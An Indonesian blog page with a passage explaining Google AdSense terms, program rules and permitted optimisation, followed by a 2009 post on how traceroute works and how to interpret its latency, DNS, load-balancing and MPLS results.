* Link Units hampir sama dengan Ad Units, hanya saja formatnya mirip dengan format menu yang biasa kita temui di situs-situs web. Yang membedakan Link Units dengan Ad Units adalah pada saat pengunjung meng-klik iklan ini, maka ia akan diarahkan pada halaman hasil pencarian di search engine Google. Publisher baru akan mendapatkan pemasukan apabila pengunjung mengklik salah satu Ad Unit yang ada di halaman tersebut. Pada prakteknya, Link Units terbukti menghasilkan pemasukan lebih banyak dibandingkan Ad Units biasa.

* AdSense for Content adalah iklan AdSense yang dipasang di dalam suatu halaman. Iklan-iklan yang muncul adalah iklan-iklan yang berhubungan dengan isi halaman tersebut. Atau istilahnya menggunakan konsep kontekstual. Ad Units dan Link Units adalah yang termasuk dalam AdSense for Content ini.

* Pada AdSense for Content, iklan tidak selalu muncul. Sebabnya antara lain bisa karena memang stok iklan yang berhubungan dengan isi situs sudah habis atau Google tidak dapat memperkirakan apa isi situs itu sebenarnya. Jika ini terjadi, secara default, yang ditampilkan adalah iklan layanan masyarakat atau sering dikenal dengan istilah PSA (Public Service Ads). Karena bertipe donasi, maka jika diklik, iklan ini tidak menghasilkan apa-apa bagi publisher. Untuk mengatasinya, Google memperbolehkan kita untuk memasang Alternate Ads atau iklan alternatif. Jika Ad Units yang dibuat telah diatur dengan menggunakan Alternate Ads, maka apabila Ad Units tersebut tidak dapat tampil, yang muncul adalah iklan alternatif yang telah diatur sebelumnya.

* Channels adalah semacam label yang dapat diberikan pada Ad Units, Link Units, AdSense for Search, dan Referrals. Satu unit iklan dapat memiliki lebih dari satu label, dan sebaliknya, satu label dapat digunakan untuk lebih dari satu unit iklan. Di halaman laporan Google AdSense, hasil laporan akan dikelompokkan berdasarkan Channels, sehingga penggunaan Channels akan sangat memudahkan publisher untuk menganalisa performa AdSense mereka. Umumnya, publisher akan memberikan nama Channels yang sama pada unit-unit iklan yang ada di satu situs. Jika ingin lebih detail, sah-sah saja untuk memberikan nama Channels yang berbeda pada setiap unit iklan di masing-masing situs. Yang perlu diingat, maksimal jumlah Channels yang diperbolehkan saat ini adalah 200 kanal.

* CPC (Cost Per Click) adalah jumlah uang yang akan didapatkan oleh publisher apabila Ad Units tertentu diklik. Nilai CPC masing-masing Ad Units berbeda dan ditentukan oleh banyak faktor, termasuk performa dan kualitas situs milik publisher. Namun secara umum, nilai maksimal yang mungkin adalah 20% dari nilai tawaran dinamis yang ditawarkan oleh pemasang iklan.

Kebijakan program AdSense

Meski program AdSense memberikan keuntungan yang besar, Google menetapkan aturan ketat untuk melindungi kepentingan semua pihak yang terlibat, termasuk pemasang iklan yang sering dirugikan oleh tindakan tidak terpuji pemilik situs anggota program AdSense. Beberapa larangan Google yang harus ditaati pemilik situs web atau blog peserta program AdSense adalah:

* Mengklik iklan yang ditampilkan situs milik sendiri, baik dengan cara manual atau dengan bantuan perangkat lunak khusus
* Dengan sengaja mendorong pengunjung situs untuk mengklik iklan yang ditampilkan, misalnya dengan kata-kata “klik iklan ini” atau “kunjungi halaman ini”
* Mengubah bentuk dan ukuran unit iklan yang telah ditentukan Google
* Membuat pranala langsung menuju halaman hasil pencarian AdSense untuk pencarian
* Mengisi secara otomatis kotak pencarian AdSense dengan katakunci tertentu
* Memanipulasi target iklan dengan katakunci tersembunyi atau dengan IFRAME
* Kode unit iklan AdSense harus ditempatkan langsung pada kode html Situs web tanpa perubahan. Pemilik situs tidak diperbolehkan mengubah kode AdSense dengan alasan apapun, misalnya dengan tujuan menampilkan hasil klik di jendela pop up atau mengalihkan target iklan.

Optimisasi Penghasilan AdSense

Potensi keuntungan mengikuti program AdSense membuat banyak pemilik situs web mengembangkan berbagai metode untuk meningkatkan jumlah klik pada iklan yang mereka tayangkan. Sebagian metode terbukti ilegal dan melawan kebijakan resmi program AdSense. Metode yang lain diperbolehkan, bahkan didorong penggunaannya oleh Google. Beberapa metode yang dianggap sah adalah:

* Memodifikasi warna unit iklan menggunakan palet warna yang disediakan AdSense
* Meletakkan unit iklan pada posisi tertentu pada halaman web yang dianggap memiliki tingkat keterbacaan tinggi
* Menghilangkan garis tepi unit iklan dan menyamakan warna latarnya dengan warna latar halaman web sehingga unit iklan terlihat membaur dengan isi halaman

Sumber : di sini
Read More »

Selasa, 13 Oktober 2009

Membaca hasil traceroute dengan tepat



Untuk mengetahui jalur yang ditempuh untuk mencapai suatu node, traceroute mengirimkan 3 buah paket probe tipe UDP dari port sumber berbeda, dengan TTL bernilai 1. Saat paket tersebut mencapai router next-hop, TTL paket akan dikurangi satu sehingga menjadi 0, dan router next-hop akan menolak paket UDP tersebut sembari mengirimkan paket ICMP Time-to-Live Exceeded ke node asal traceroute tersebut. Dengan cara ini, pengirim traceroute tahu alamat IP pertama dari jalur yang ditempuh.



Kemudian, sumber traceroute mengirimkan 3 buah paket UDP lagi dengan nilai TTL yang dinaikkan 1 (TTL = 2), sehingga router pertama di jalur menuju tujuan traceroute akan melewatkan paket UDP tersebut ke router selanjutnya. Router hop kedua akan melihat bahwa paket tersebut sudah expired (TTLnya jadi 1, setelah dikurangi oleh router pertama). Maka, seperti halnya router pertama, router tersebut akan mengirimkan paket ICMP Time-to-Live Exceeded ke sumber traceroute. Sekarang, sumber traceroute telah mengetahui hop kedua dari jalur menuju tujuan traceroute.

Sumber traceroute akan mengirimkan lagi paket UDP dengan TTL ditambah 1 (TTL = 3). Router hop ketiga akan membalas dengan paket ICMP Time-to-Live Exceeded ke sumber traceroute, sehingga sumber traceroute mengetahui alamat IP router hop ketiga. Proses ini akan diulang terus paket UDP yang dikirimkan mencapai alamat IP tujuan traceroute.

Tiga buah paket UDP traceroute adalah jumlah paket default dari aplikasi traceroute. Inilah mengapa kita melihat tiga buah tampilan latensi saat melihat hasil traceroute yang dijalankan.



Tidak semua aplikasi traceroute menggunakan UDP. Windows menggunakan paket ICMP, sedangkan sejumlah aplikasi tertentu menggunakan paket TCP.

Cara menghitung latensi tiap hop adalah dengan mengukur selisih antara timestamp paket probe yang dikirimkan dengan timestamp dari paket ICMP TTL exceeded yang diterima. Router yang berada sepanjang jalur pengiriman tidak akan melakukan pemrosesan data timestamp. Dari cara ini, yang kita ketahui hanyalah waktu total pulang-pergi dari sumber ke router hop tertentu. Delay yang terjadi sepanjang perjalanan kembali ke sumber juga akan berpengaruh.

Kemudian, alamat IP dari interface manakah yang kita lihat dari hasil traceroute?



Alamat IP yang kita lihat dari hasil traceroute adalah IP dari interface ingress router. Sebenarnya, RFC 1812 menyebutkan bahwa sumber ICMP haruslah dari interface egress. Namun, hal ini akan menyebabkan hasil traceroute menjadi kacau.

Interpretasi DNS dari Hasil Traceroute

Dengan traceroute, kita dapat menganalisis informasi mengenai lokasi router, tipe dan kapasitas interface, tipe dan fungsi router, serta batas-batas network yang dilalui, berdasarkan DNS interface yang dilalui.



Dari gambar di atas, terlihat informasi kapasitas tiap link yang dilalui (OC 48, dll), tipe interface dari router (10GE, Sonet, dll), serta lokasi dari setiap router (Amsterdam [ams], New York [nyc], dll), dengan melihat entry DNSnya.

Memahami Delay di Jaringan

Tiga jenis delay di jaringan yang umum ditemui :

Serialization delay; delay yang disebabkan karena frame data harus dikirimkan dengan ukuran tertentu dan waktu tertentu pula (berkaitan dengan clocking).
Delay antrian; waktu yang dihabiskan selama paket berada dalam antrian router sebelum dikirim.
Delay pengiriman; waktu yang diperlukan untuk mengirimkan paket melintasi suatu link. Delay ini benar-benar bergantung pada media fisik yang digunakan untuk transmisi : kecepatan cahaya pada FO, atau kecepatan perambatan sinyal listrik pada media kabel.
Bagaimana cara mengidentifikasi apakah suatu latensi normal atau tidak? Pertama, kita harus menghitung perkiraan delay propagasi normalnya. Ini dapat dilakukan berdasarkan keterangan lokasi fisik antara dua router beserta media fisik link yang digunakan. Kemudian, kita bandingkan dengan hasil dari traceroute. Apabila perbedaannya cukup besar, berarti terdapat permasalahan pada hop tersebut.

Prioritization dan rate limiting pada router

Router yang ada saat ini memiliki karakteristik untuk menjadikan paket ICMP sebagai prioritas terakhir dalam pemrosesan. Kemudian, ada proses-proses tertentu pada router yang menyebabkan CPU router menjadi tinggi, misalnya proses BGP scanner pada Cisco. Hal ini akan mempengaruhi proses pembuatan paket ICMP TTL exceeded, sehingga dapat membuat penafsiran traceroute yang salah.

Selanjutnya, setiap vendor router menerapkan pembatasan pembuatan paket ICMP. Ini dimaksudkan untuk mengurangi beban CPU router dari hal-hal yang kurang penting. Hal ini juga dapat mempengaruhi hasil delay dari traceroute.

Jalur Asimetris (asymmetric path)

Hop-hop yang ditampilkan traceroute hanya menjelaskan mengenai arah pengiriman paket dari sumber traceroute ke tujuan. Di sisi lain, kita tidak mengetahui jalur pengiriman paket dari router perantara ke arah kita (sumber traceroute). Ini akan menjadi masalah ketika jalur pengiriman paket traceroute berbeda dengan jalur pengiriman ICMP TTL exceeded.

Permasalahan jalur asimetris sering terjadi pada router yang berada di perbatasan domain AS. Ini karena terdapat perbedaan penerapan policy routing pada dua domain AS yang berbatasan tersebut. Permasalahan ini sering terjadi pada suatu domain yang bersifat multi-homing.

Multiple Path dan Load Balancing

Misalnya dengan menggunakan tools level3 ini kita mendapatkan hasil berikut :



pada hop 2,3, dan 7, terlihat bahwa ada beberapa node yang dilewati. Ini terjadi karena paket probe yang dikirim traceroute bersumber dari port yang berbeda, kemudian pada router hop tersebut diterapkan policy equal-cost multi-path, sehingga pada sebuah hop dapat terlihat ada beberapa rute yang ditempuh. Pada contoh di atas, hop 2, 3, dan 7 mengirimkan dua paket pada jalur yang sama, sedangkan satu paket yang lain pada jalur yang berbeda.

MPLS dan Traceroute

Hampir semua jaringan core berbasis MPLS. Router core tersebut bisa jadi tidak berisi tabel routing global. Bagaimana caranya router tersebut mengirimkan paket ICMP? Caranya adalah dengan menggunakan ICMP tunneling : jika menghasilkan ICMP berdasarkan suatu paket pada sebuah LSP, maka taruh ICMP tersebut pada LSP yang sama. Namun, solusi ini akan membuat hasil traceroute menjadi aneh. Semua paket ICMP TTL exceeded harus dikirimkan menuju ujung LSP terlebih dahulu sebelum dikirimkan kembali ke sumber traceroute. Ini menyebabkan setiap hop di LSP terlihat memiliki RTT yang sama dengan tujuan traceroute.



Pada contoh di atas, hop ketiga sampai dengan node tujuan memiliki RTT yang hampir sama, bahkan ada node transit yang RTTnya lebih besar dibandingkan dengan node tujuan. Ini karena di jaringan core AT&T digunakan MPLS.

Sumber : disini, disini dan disini



Read More »

Newsletter